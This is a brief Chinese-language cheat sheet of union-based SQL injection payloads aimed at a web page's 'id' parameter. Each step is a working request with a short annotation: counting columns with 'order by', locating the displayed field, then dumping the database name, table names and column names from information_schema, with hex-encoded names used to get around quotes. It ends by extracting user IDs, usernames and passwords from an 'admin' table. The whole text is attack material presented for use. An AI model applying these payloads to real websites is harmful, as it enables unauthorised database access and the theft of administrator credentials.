1.http://*id=31 order by 6 注:若6页面正常,7页面不正常,说明有6个字段
2.http://*id=31 and 1=2 union select 1,2,3,4,5,6 注:定位报错字段,若页面显示3
3.http://*id=31 and 1=2 union select 1,2,database(),4,5,6 from information_schema.tables where table_schema=database()#
注:database()暴出当前库名。from后是mysql默认为名(若是access则自己猜)
http://*id=31 and 1=2 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=0x61706861636B5F64616261# 注:暴出库中表名。最后的十六进制是aphack_data库(这里用十六进制是用来绕过双引号)
http://*id=31 and 1=2 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x61646D696E# 注:暴出表中字段。十六进制是admin表
http://*id=31 and 1=2 union select 1,2,group_concat(ID,0x3a,User,0x3a,Passwd,0x3a,UserName) ,4,5,6 from admin# 注:直接暴出admin表中字段id,user,passwd,username内容。这里0x3a代表“:号”,为了分隔各个字段返回结果